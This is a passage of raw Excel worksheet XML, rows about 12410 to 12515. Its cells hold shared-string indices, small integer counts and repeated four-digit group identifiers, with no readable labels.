        <v>1</v>
      </c>
      <c r="D12410">
        <v>997</v>
      </c>
    </row>
    <row r="12411" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12411" t="s">
        <v>16228</v>
      </c>
      <c r="B12411" t="s">
        <v>16211</v>
      </c>
      <c r="C12411">
        <v>0</v>
      </c>
      <c r="D12411">
        <v>5020</v>
      </c>
    </row>
    <row r="12412" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12412" t="s">
        <v>16231</v>
      </c>
      <c r="B12412" t="s">
        <v>16212</v>
      </c>
      <c r="C12412">
        <v>0</v>
      </c>
      <c r="D12412">
        <v>5020</v>
      </c>
    </row>
    <row r="12413" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12413" t="s">
        <v>16228</v>
      </c>
      <c r="B12413" t="s">
        <v>16213</v>
      </c>
      <c r="C12413">
        <v>0</v>
      </c>
      <c r="D12413">
        <v>5020</v>
      </c>
    </row>
    <row r="12414" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12414" t="s">
        <v>16231</v>
      </c>
      <c r="B12414" t="s">
        <v>16214</v>
      </c>
      <c r="C12414">
        <v>0</v>
      </c>
      <c r="D12414">
        <v>5020</v>
      </c>
    </row>
    <row r="12415" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12415" t="s">
        <v>16228</v>
      </c>
      <c r="B12415" t="s">
        <v>16215</v>
      </c>
      <c r="C12415">
        <v>8</v>
      </c>
      <c r="D12415">
        <v>5020</v>
      </c>
    </row>
    <row r="12416" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12416" t="s">
        <v>16231</v>
      </c>
      <c r="B12416" t="s">
        <v>16216</v>
      </c>
      <c r="C12416">
        <v>1</v>
      </c>
      <c r="D12416">
        <v>5020</v>
      </c>
    </row>
    <row r="12417" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12417" t="s">
        <v>16228</v>
      </c>
      <c r="B12417" t="s">
        <v>16217</v>
      </c>
      <c r="C12417">
        <v>0</v>
      </c>
      <c r="D12417">
        <v>5020</v>
      </c>
    </row>
    <row r="12418" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12418" t="s">
        <v>16231</v>
      </c>
      <c r="B12418" t="s">
        <v>16218</v>
      </c>
      <c r="C12418">
        <v>0</v>
      </c>
      <c r="D12418">
        <v>5020</v>
      </c>
    </row>
    <row r="12419" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12419" t="s">
        <v>16229</v>
      </c>
      <c r="B12419" t="s">
        <v>16219</v>
      </c>
      <c r="C12419">
        <v>0</v>
      </c>
      <c r="D12419">
        <v>5020</v>
      </c>
    </row>
    <row r="12420" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12420" t="s">
        <v>16230</v>
      </c>
      <c r="B12420" t="s">
        <v>16220</v>
      </c>
      <c r="C12420">
        <v>0</v>
      </c>
      <c r="D12420">
        <v>5020</v>
      </c>
    </row>
    <row r="12421" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12421" t="s">
        <v>16229</v>
      </c>
      <c r="B12421" t="s">
        <v>16221</v>
      </c>
      <c r="C12421">
        <v>15</v>
      </c>
      <c r="D12421">
        <v>5020</v>
      </c>
    </row>
    <row r="12422" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12422" t="s">
        <v>16230</v>
      </c>
      <c r="B12422" t="s">
        <v>16222</v>
      </c>
      <c r="C12422">
        <v>0</v>
      </c>
      <c r="D12422">
        <v>5020</v>
      </c>
    </row>
    <row r="12423" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12423" t="s">
        <v>16223</v>
      </c>
      <c r="B12423" t="s">
        <v>16223</v>
      </c>
      <c r="C12423">
        <v>25</v>
      </c>
      <c r="D12423">
        <v>5020</v>
      </c>
    </row>
    <row r="12424" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12424" t="s">
        <v>16224</v>
      </c>
      <c r="B12424" t="s">
        <v>16224</v>
      </c>
      <c r="C12424">
        <v>0</v>
      </c>
      <c r="D12424">
        <v>5020</v>
      </c>
    </row>
    <row r="12425" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12425" t="s">
        <v>16228</v>
      </c>
      <c r="B12425" t="s">
        <v>16211</v>
      </c>
      <c r="C12425">
        <v>0</v>
      </c>
      <c r="D12425">
        <v>1307</v>
      </c>
    </row>
    <row r="12426" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12426" t="s">
        <v>16231</v>
      </c>
      <c r="B12426" t="s">
        <v>16212</v>
      </c>
      <c r="C12426">
        <v>0</v>
      </c>
      <c r="D12426">
        <v>1307</v>
      </c>
    </row>
    <row r="12427" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12427" t="s">
        <v>16228</v>
      </c>
      <c r="B12427" t="s">
        <v>16213</v>
      </c>
      <c r="C12427">
        <v>0</v>
      </c>
      <c r="D12427">
        <v>1307</v>
      </c>
    </row>
    <row r="12428" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12428" t="s">
        <v>16231</v>
      </c>
      <c r="B12428" t="s">
        <v>16214</v>
      </c>
      <c r="C12428">
        <v>0</v>
      </c>
      <c r="D12428">
        <v>1307</v>
      </c>
    </row>
    <row r="12429" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12429" t="s">
        <v>16228</v>
      </c>
      <c r="B12429" t="s">
        <v>16215</v>
      </c>
      <c r="C12429">
        <v>0</v>
      </c>
      <c r="D12429">
        <v>1307</v>
      </c>
    </row>
    <row r="12430" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12430" t="s">
        <v>16231</v>
      </c>
      <c r="B12430" t="s">
        <v>16216</v>
      </c>
      <c r="C12430">
        <v>2</v>
      </c>
      <c r="D12430">
        <v>1307</v>
      </c>
    </row>
    <row r="12431" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12431" t="s">
        <v>16228</v>
      </c>
      <c r="B12431" t="s">
        <v>16217</v>
      </c>
      <c r="C12431">
        <v>2</v>
      </c>
      <c r="D12431">
        <v>1307</v>
      </c>
    </row>
    <row r="12432" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12432" t="s">
        <v>16231</v>
      </c>
      <c r="B12432" t="s">
        <v>16218</v>
      </c>
      <c r="C12432">
        <v>0</v>
      </c>
      <c r="D12432">
        <v>1307</v>
      </c>
    </row>
    <row r="12433" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12433" t="s">
        <v>16229</v>
      </c>
      <c r="B12433" t="s">
        <v>16219</v>
      </c>
      <c r="C12433">
        <v>2</v>
      </c>
      <c r="D12433">
        <v>1307</v>
      </c>
    </row>
    <row r="12434" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12434" t="s">
        <v>16230</v>
      </c>
      <c r="B12434" t="s">
        <v>16220</v>
      </c>
      <c r="C12434">
        <v>0</v>
      </c>
      <c r="D12434">
        <v>1307</v>
      </c>
    </row>
    <row r="12435" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12435" t="s">
        <v>16229</v>
      </c>
      <c r="B12435" t="s">
        <v>16221</v>
      </c>
      <c r="C12435">
        <v>8</v>
      </c>
      <c r="D12435">
        <v>1307</v>
      </c>
    </row>
    <row r="12436" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12436" t="s">
        <v>16230</v>
      </c>
      <c r="B12436" t="s">
        <v>16222</v>
      </c>
      <c r="C12436">
        <v>0</v>
      </c>
      <c r="D12436">
        <v>1307</v>
      </c>
    </row>
    <row r="12437" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12437" t="s">
        <v>16223</v>
      </c>
      <c r="B12437" t="s">
        <v>16223</v>
      </c>
      <c r="C12437">
        <v>25</v>
      </c>
      <c r="D12437">
        <v>1307</v>
      </c>
    </row>
    <row r="12438" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12438" t="s">
        <v>16224</v>
      </c>
      <c r="B12438" t="s">
        <v>16224</v>
      </c>
      <c r="C12438">
        <v>2</v>
      </c>
      <c r="D12438">
        <v>1307</v>
      </c>
    </row>
    <row r="12439" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12439" t="s">
        <v>16228</v>
      </c>
      <c r="B12439" t="s">
        <v>16217</v>
      </c>
      <c r="C12439">
        <v>2</v>
      </c>
      <c r="D12439">
        <v>2772</v>
      </c>
    </row>
    <row r="12440" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12440" t="s">
        <v>16228</v>
      </c>
      <c r="B12440" t="s">
        <v>16211</v>
      </c>
      <c r="C12440">
        <v>0</v>
      </c>
      <c r="D12440">
        <v>5045</v>
      </c>
    </row>
    <row r="12441" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12441" t="s">
        <v>16231</v>
      </c>
      <c r="B12441" t="s">
        <v>16212</v>
      </c>
      <c r="C12441">
        <v>0</v>
      </c>
      <c r="D12441">
        <v>5045</v>
      </c>
    </row>
    <row r="12442" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12442" t="s">
        <v>16228</v>
      </c>
      <c r="B12442" t="s">
        <v>16213</v>
      </c>
      <c r="C12442">
        <v>0</v>
      </c>
      <c r="D12442">
        <v>5045</v>
      </c>
    </row>
    <row r="12443" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12443" t="s">
        <v>16231</v>
      </c>
      <c r="B12443" t="s">
        <v>16214</v>
      </c>
      <c r="C12443">
        <v>0</v>
      </c>
      <c r="D12443">
        <v>5045</v>
      </c>
    </row>
    <row r="12444" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12444" t="s">
        <v>16228</v>
      </c>
      <c r="B12444" t="s">
        <v>16215</v>
      </c>
      <c r="C12444">
        <v>2</v>
      </c>
      <c r="D12444">
        <v>5045</v>
      </c>
    </row>
    <row r="12445" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12445" t="s">
        <v>16231</v>
      </c>
      <c r="B12445" t="s">
        <v>16216</v>
      </c>
      <c r="C12445">
        <v>2</v>
      </c>
      <c r="D12445">
        <v>5045</v>
      </c>
    </row>
    <row r="12446" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12446" t="s">
        <v>16228</v>
      </c>
      <c r="B12446" t="s">
        <v>16217</v>
      </c>
      <c r="C12446">
        <v>2</v>
      </c>
      <c r="D12446">
        <v>5045</v>
      </c>
    </row>
    <row r="12447" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12447" t="s">
        <v>16231</v>
      </c>
      <c r="B12447" t="s">
        <v>16218</v>
      </c>
      <c r="C12447">
        <v>0</v>
      </c>
      <c r="D12447">
        <v>5045</v>
      </c>
    </row>
    <row r="12448" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12448" t="s">
        <v>16229</v>
      </c>
      <c r="B12448" t="s">
        <v>16219</v>
      </c>
      <c r="C12448">
        <v>0</v>
      </c>
      <c r="D12448">
        <v>5045</v>
      </c>
    </row>
    <row r="12449" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12449" t="s">
        <v>16230</v>
      </c>
      <c r="B12449" t="s">
        <v>16220</v>
      </c>
      <c r="C12449">
        <v>0</v>
      </c>
      <c r="D12449">
        <v>5045</v>
      </c>
    </row>
    <row r="12450" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12450" t="s">
        <v>16229</v>
      </c>
      <c r="B12450" t="s">
        <v>16221</v>
      </c>
      <c r="C12450">
        <v>2</v>
      </c>
      <c r="D12450">
        <v>5045</v>
      </c>
    </row>
    <row r="12451" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12451" t="s">
        <v>16230</v>
      </c>
      <c r="B12451" t="s">
        <v>16222</v>
      </c>
      <c r="C12451">
        <v>10</v>
      </c>
      <c r="D12451">
        <v>5045</v>
      </c>
    </row>
    <row r="12452" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12452" t="s">
        <v>16223</v>
      </c>
      <c r="B12452" t="s">
        <v>16223</v>
      </c>
      <c r="C12452">
        <v>26</v>
      </c>
      <c r="D12452">
        <v>5045</v>
      </c>
    </row>
    <row r="12453" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12453" t="s">
        <v>16224</v>
      </c>
      <c r="B12453" t="s">
        <v>16224</v>
      </c>
      <c r="C12453">
        <v>0</v>
      </c>
      <c r="D12453">
        <v>5045</v>
      </c>
    </row>
    <row r="12454" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12454" t="s">
        <v>16228</v>
      </c>
      <c r="B12454" t="s">
        <v>16211</v>
      </c>
      <c r="C12454">
        <v>0</v>
      </c>
      <c r="D12454">
        <v>1290</v>
      </c>
    </row>
    <row r="12455" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12455" t="s">
        <v>16231</v>
      </c>
      <c r="B12455" t="s">
        <v>16212</v>
      </c>
      <c r="C12455">
        <v>0</v>
      </c>
      <c r="D12455">
        <v>1290</v>
      </c>
    </row>
    <row r="12456" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12456" t="s">
        <v>16228</v>
      </c>
      <c r="B12456" t="s">
        <v>16213</v>
      </c>
      <c r="C12456">
        <v>0</v>
      </c>
      <c r="D12456">
        <v>1290</v>
      </c>
    </row>
    <row r="12457" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12457" t="s">
        <v>16231</v>
      </c>
      <c r="B12457" t="s">
        <v>16214</v>
      </c>
      <c r="C12457">
        <v>0</v>
      </c>
      <c r="D12457">
        <v>1290</v>
      </c>
    </row>
    <row r="12458" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12458" t="s">
        <v>16228</v>
      </c>
      <c r="B12458" t="s">
        <v>16215</v>
      </c>
      <c r="C12458">
        <v>2</v>
      </c>
      <c r="D12458">
        <v>1290</v>
      </c>
    </row>
    <row r="12459" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12459" t="s">
        <v>16231</v>
      </c>
      <c r="B12459" t="s">
        <v>16216</v>
      </c>
      <c r="C12459">
        <v>1</v>
      </c>
      <c r="D12459">
        <v>1290</v>
      </c>
    </row>
    <row r="12460" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12460" t="s">
        <v>16228</v>
      </c>
      <c r="B12460" t="s">
        <v>16217</v>
      </c>
      <c r="C12460">
        <v>59</v>
      </c>
      <c r="D12460">
        <v>1290</v>
      </c>
    </row>
    <row r="12461" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12461" t="s">
        <v>16231</v>
      </c>
      <c r="B12461" t="s">
        <v>16218</v>
      </c>
      <c r="C12461">
        <v>6</v>
      </c>
      <c r="D12461">
        <v>1290</v>
      </c>
    </row>
    <row r="12462" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12462" t="s">
        <v>16229</v>
      </c>
      <c r="B12462" t="s">
        <v>16219</v>
      </c>
      <c r="C12462">
        <v>0</v>
      </c>
      <c r="D12462">
        <v>1290</v>
      </c>
    </row>
    <row r="12463" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12463" t="s">
        <v>16230</v>
      </c>
      <c r="B12463" t="s">
        <v>16220</v>
      </c>
      <c r="C12463">
        <v>0</v>
      </c>
      <c r="D12463">
        <v>1290</v>
      </c>
    </row>
    <row r="12464" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12464" t="s">
        <v>16229</v>
      </c>
      <c r="B12464" t="s">
        <v>16221</v>
      </c>
      <c r="C12464">
        <v>0</v>
      </c>
      <c r="D12464">
        <v>1290</v>
      </c>
    </row>
    <row r="12465" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12465" t="s">
        <v>16230</v>
      </c>
      <c r="B12465" t="s">
        <v>16222</v>
      </c>
      <c r="C12465">
        <v>0</v>
      </c>
      <c r="D12465">
        <v>1290</v>
      </c>
    </row>
    <row r="12466" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12466" t="s">
        <v>16223</v>
      </c>
      <c r="B12466" t="s">
        <v>16223</v>
      </c>
      <c r="C12466">
        <v>26</v>
      </c>
      <c r="D12466">
        <v>1290</v>
      </c>
    </row>
    <row r="12467" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12467" t="s">
        <v>16224</v>
      </c>
      <c r="B12467" t="s">
        <v>16224</v>
      </c>
      <c r="C12467">
        <v>1</v>
      </c>
      <c r="D12467">
        <v>1290</v>
      </c>
    </row>
    <row r="12468" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12468" t="s">
        <v>16228</v>
      </c>
      <c r="B12468" t="s">
        <v>16213</v>
      </c>
      <c r="C12468">
        <v>1</v>
      </c>
      <c r="D12468">
        <v>1290</v>
      </c>
    </row>
    <row r="12469" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12469" t="s">
        <v>16228</v>
      </c>
      <c r="B12469" t="s">
        <v>16211</v>
      </c>
      <c r="C12469">
        <v>0</v>
      </c>
      <c r="D12469">
        <v>974</v>
      </c>
    </row>
    <row r="12470" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12470" t="s">
        <v>16231</v>
      </c>
      <c r="B12470" t="s">
        <v>16212</v>
      </c>
      <c r="C12470">
        <v>0</v>
      </c>
      <c r="D12470">
        <v>974</v>
      </c>
    </row>
    <row r="12471" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12471" t="s">
        <v>16228</v>
      </c>
      <c r="B12471" t="s">
        <v>16213</v>
      </c>
      <c r="C12471">
        <v>0</v>
      </c>
      <c r="D12471">
        <v>974</v>
      </c>
    </row>
    <row r="12472" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12472" t="s">
        <v>16231</v>
      </c>
      <c r="B12472" t="s">
        <v>16214</v>
      </c>
      <c r="C12472">
        <v>0</v>
      </c>
      <c r="D12472">
        <v>974</v>
      </c>
    </row>
    <row r="12473" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12473" t="s">
        <v>16228</v>
      </c>
      <c r="B12473" t="s">
        <v>16215</v>
      </c>
      <c r="C12473">
        <v>0</v>
      </c>
      <c r="D12473">
        <v>2698</v>
      </c>
    </row>
    <row r="12474" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12474" t="s">
        <v>16231</v>
      </c>
      <c r="B12474" t="s">
        <v>16216</v>
      </c>
      <c r="C12474">
        <v>5</v>
      </c>
      <c r="D12474">
        <v>2698</v>
      </c>
    </row>
    <row r="12475" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12475" t="s">
        <v>16231</v>
      </c>
      <c r="B12475" t="s">
        <v>16218</v>
      </c>
      <c r="C12475">
        <v>50</v>
      </c>
      <c r="D12475">
        <v>2698</v>
      </c>
    </row>
    <row r="12476" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12476" t="s">
        <v>16228</v>
      </c>
      <c r="B12476" t="s">
        <v>16211</v>
      </c>
      <c r="C12476">
        <v>0</v>
      </c>
      <c r="D12476">
        <v>1096</v>
      </c>
    </row>
    <row r="12477" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12477" t="s">
        <v>16231</v>
      </c>
      <c r="B12477" t="s">
        <v>16212</v>
      </c>
      <c r="C12477">
        <v>0</v>
      </c>
      <c r="D12477">
        <v>1096</v>
      </c>
    </row>
    <row r="12478" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12478" t="s">
        <v>16228</v>
      </c>
      <c r="B12478" t="s">
        <v>16213</v>
      </c>
      <c r="C12478">
        <v>7</v>
      </c>
      <c r="D12478">
        <v>1096</v>
      </c>
    </row>
    <row r="12479" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12479" t="s">
        <v>16231</v>
      </c>
      <c r="B12479" t="s">
        <v>16214</v>
      </c>
      <c r="C12479">
        <v>5</v>
      </c>
      <c r="D12479">
        <v>1096</v>
      </c>
    </row>
    <row r="12480" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12480" t="s">
        <v>16228</v>
      </c>
      <c r="B12480" t="s">
        <v>16215</v>
      </c>
      <c r="C12480">
        <v>7</v>
      </c>
      <c r="D12480">
        <v>1096</v>
      </c>
    </row>
    <row r="12481" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12481" t="s">
        <v>16231</v>
      </c>
      <c r="B12481" t="s">
        <v>16216</v>
      </c>
      <c r="C12481">
        <v>5</v>
      </c>
      <c r="D12481">
        <v>1096</v>
      </c>
    </row>
    <row r="12482" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12482" t="s">
        <v>16228</v>
      </c>
      <c r="B12482" t="s">
        <v>16217</v>
      </c>
      <c r="C12482">
        <v>0</v>
      </c>
      <c r="D12482">
        <v>1096</v>
      </c>
    </row>
    <row r="12483" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12483" t="s">
        <v>16231</v>
      </c>
      <c r="B12483" t="s">
        <v>16218</v>
      </c>
      <c r="C12483">
        <v>0</v>
      </c>
      <c r="D12483">
        <v>1096</v>
      </c>
    </row>
    <row r="12484" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12484" t="s">
        <v>16229</v>
      </c>
      <c r="B12484" t="s">
        <v>16219</v>
      </c>
      <c r="C12484">
        <v>0</v>
      </c>
      <c r="D12484">
        <v>1096</v>
      </c>
    </row>
    <row r="12485" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12485" t="s">
        <v>16230</v>
      </c>
      <c r="B12485" t="s">
        <v>16220</v>
      </c>
      <c r="C12485">
        <v>0</v>
      </c>
      <c r="D12485">
        <v>1096</v>
      </c>
    </row>
    <row r="12486" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12486" t="s">
        <v>16229</v>
      </c>
      <c r="B12486" t="s">
        <v>16221</v>
      </c>
      <c r="C12486">
        <v>5</v>
      </c>
      <c r="D12486">
        <v>1096</v>
      </c>
    </row>
    <row r="12487" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12487" t="s">
        <v>16230</v>
      </c>
      <c r="B12487" t="s">
        <v>16222</v>
      </c>
      <c r="C12487">
        <v>0</v>
      </c>
      <c r="D12487">
        <v>1096</v>
      </c>
    </row>
    <row r="12488" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12488" t="s">
        <v>16223</v>
      </c>
      <c r="B12488" t="s">
        <v>16223</v>
      </c>
      <c r="C12488">
        <v>26</v>
      </c>
      <c r="D12488">
        <v>1096</v>
      </c>
    </row>
    <row r="12489" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12489" t="s">
        <v>16224</v>
      </c>
      <c r="B12489" t="s">
        <v>16224</v>
      </c>
      <c r="C12489">
        <v>1</v>
      </c>
      <c r="D12489">
        <v>1096</v>
      </c>
    </row>
    <row r="12490" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12490" t="s">
        <v>16228</v>
      </c>
      <c r="B12490" t="s">
        <v>16211</v>
      </c>
      <c r="C12490">
        <v>0</v>
      </c>
      <c r="D12490">
        <v>2229</v>
      </c>
    </row>
    <row r="12491" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12491" t="s">
        <v>16231</v>
      </c>
      <c r="B12491" t="s">
        <v>16212</v>
      </c>
      <c r="C12491">
        <v>0</v>
      </c>
      <c r="D12491">
        <v>2229</v>
      </c>
    </row>
    <row r="12492" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12492" t="s">
        <v>16228</v>
      </c>
      <c r="B12492" t="s">
        <v>16213</v>
      </c>
      <c r="C12492">
        <v>0</v>
      </c>
      <c r="D12492">
        <v>2229</v>
      </c>
    </row>
    <row r="12493" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12493" t="s">
        <v>16231</v>
      </c>
      <c r="B12493" t="s">
        <v>16214</v>
      </c>
      <c r="C12493">
        <v>0</v>
      </c>
      <c r="D12493">
        <v>2229</v>
      </c>
    </row>
    <row r="12494" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12494" t="s">
        <v>16228</v>
      </c>
      <c r="B12494" t="s">
        <v>16215</v>
      </c>
      <c r="C12494">
        <v>0</v>
      </c>
      <c r="D12494">
        <v>2229</v>
      </c>
    </row>
    <row r="12495" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12495" t="s">
        <v>16231</v>
      </c>
      <c r="B12495" t="s">
        <v>16216</v>
      </c>
      <c r="C12495">
        <v>2</v>
      </c>
      <c r="D12495">
        <v>2229</v>
      </c>
    </row>
    <row r="12496" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12496" t="s">
        <v>16228</v>
      </c>
      <c r="B12496" t="s">
        <v>16217</v>
      </c>
      <c r="C12496">
        <v>4</v>
      </c>
      <c r="D12496">
        <v>2229</v>
      </c>
    </row>
    <row r="12497" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12497" t="s">
        <v>16231</v>
      </c>
      <c r="B12497" t="s">
        <v>16218</v>
      </c>
      <c r="C12497">
        <v>0</v>
      </c>
      <c r="D12497">
        <v>2229</v>
      </c>
    </row>
    <row r="12498" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12498" t="s">
        <v>16229</v>
      </c>
      <c r="B12498" t="s">
        <v>16219</v>
      </c>
      <c r="C12498">
        <v>0</v>
      </c>
      <c r="D12498">
        <v>2229</v>
      </c>
    </row>
    <row r="12499" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12499" t="s">
        <v>16230</v>
      </c>
      <c r="B12499" t="s">
        <v>16220</v>
      </c>
      <c r="C12499">
        <v>1</v>
      </c>
      <c r="D12499">
        <v>2229</v>
      </c>
    </row>
    <row r="12500" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12500" t="s">
        <v>16229</v>
      </c>
      <c r="B12500" t="s">
        <v>16221</v>
      </c>
      <c r="C12500">
        <v>41</v>
      </c>
      <c r="D12500">
        <v>2229</v>
      </c>
    </row>
    <row r="12501" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12501" t="s">
        <v>16230</v>
      </c>
      <c r="B12501" t="s">
        <v>16222</v>
      </c>
      <c r="C12501">
        <v>0</v>
      </c>
      <c r="D12501">
        <v>2229</v>
      </c>
    </row>
    <row r="12502" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12502" t="s">
        <v>16223</v>
      </c>
      <c r="B12502" t="s">
        <v>16223</v>
      </c>
      <c r="C12502">
        <v>24</v>
      </c>
      <c r="D12502">
        <v>2229</v>
      </c>
    </row>
    <row r="12503" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12503" t="s">
        <v>16224</v>
      </c>
      <c r="B12503" t="s">
        <v>16224</v>
      </c>
      <c r="C12503">
        <v>3</v>
      </c>
      <c r="D12503">
        <v>2229</v>
      </c>
    </row>
    <row r="12504" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12504" t="s">
        <v>16228</v>
      </c>
      <c r="B12504" t="s">
        <v>16211</v>
      </c>
      <c r="C12504">
        <v>0</v>
      </c>
      <c r="D12504">
        <v>1161</v>
      </c>
    </row>
    <row r="12505" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12505" t="s">
        <v>16231</v>
      </c>
      <c r="B12505" t="s">
        <v>16212</v>
      </c>
      <c r="C12505">
        <v>0</v>
      </c>
      <c r="D12505">
        <v>1161</v>
      </c>
    </row>
    <row r="12506" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12506" t="s">
        <v>16228</v>
      </c>
      <c r="B12506" t="s">
        <v>16213</v>
      </c>
      <c r="C12506">
        <v>0</v>
      </c>
      <c r="D12506">
        <v>1161</v>
      </c>
    </row>
    <row r="12507" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12507" t="s">
        <v>16231</v>
      </c>
      <c r="B12507" t="s">
        <v>16214</v>
      </c>
      <c r="C12507">
        <v>0</v>
      </c>
      <c r="D12507">
        <v>1161</v>
      </c>
    </row>
    <row r="12508" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12508" t="s">
        <v>16228</v>
      </c>
      <c r="B12508" t="s">
        <v>16215</v>
      </c>
      <c r="C12508">
        <v>2</v>
      </c>
      <c r="D12508">
        <v>1161</v>
      </c>
    </row>
    <row r="12509" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12509" t="s">
        <v>16231</v>
      </c>
      <c r="B12509" t="s">
        <v>16216</v>
      </c>
      <c r="C12509">
        <v>3</v>
      </c>
      <c r="D12509">
        <v>1161</v>
      </c>
    </row>
    <row r="12510" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12510" t="s">
        <v>16228</v>
      </c>
      <c r="B12510" t="s">
        <v>16217</v>
      </c>
      <c r="C12510">
        <v>10</v>
      </c>
      <c r="D12510">
        <v>1161</v>
      </c>
    </row>
    <row r="12511" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12511" t="s">
        <v>16231</v>
      </c>
      <c r="B12511" t="s">
        <v>16218</v>
      </c>
      <c r="C12511">
        <v>5</v>
      </c>
      <c r="D12511">
        <v>1161</v>
      </c>
    </row>
    <row r="12512" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12512" t="s">
        <v>16229</v>
      </c>
      <c r="B12512" t="s">
        <v>16219</v>
      </c>
      <c r="C12512">
        <v>0</v>
      </c>
      <c r="D12512">
        <v>1161</v>
      </c>
    </row>
    <row r="12513" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12513" t="s">
        <v>16230</v>
      </c>
      <c r="B12513" t="s">
        <v>16220</v>
      </c>
      <c r="C12513">
        <v>0</v>
      </c>
      <c r="D12513">
        <v>1161</v>
      </c>
    </row>
    <row r="12514" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12514" t="s">
        <v>16229</v>
      </c>
      <c r="B12514" t="s">
        <v>16221</v>
      </c>
      <c r="C12514">
        <v>10</v>
      </c>
      <c r="D12514">
        <v>1161</v>
      </c>
    </row>
    <row r="12515" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12515" t="s">
        <v>16230</v>
      </c>
      <c r="B12515" t="s">
        <v>16222</v>
      </c>
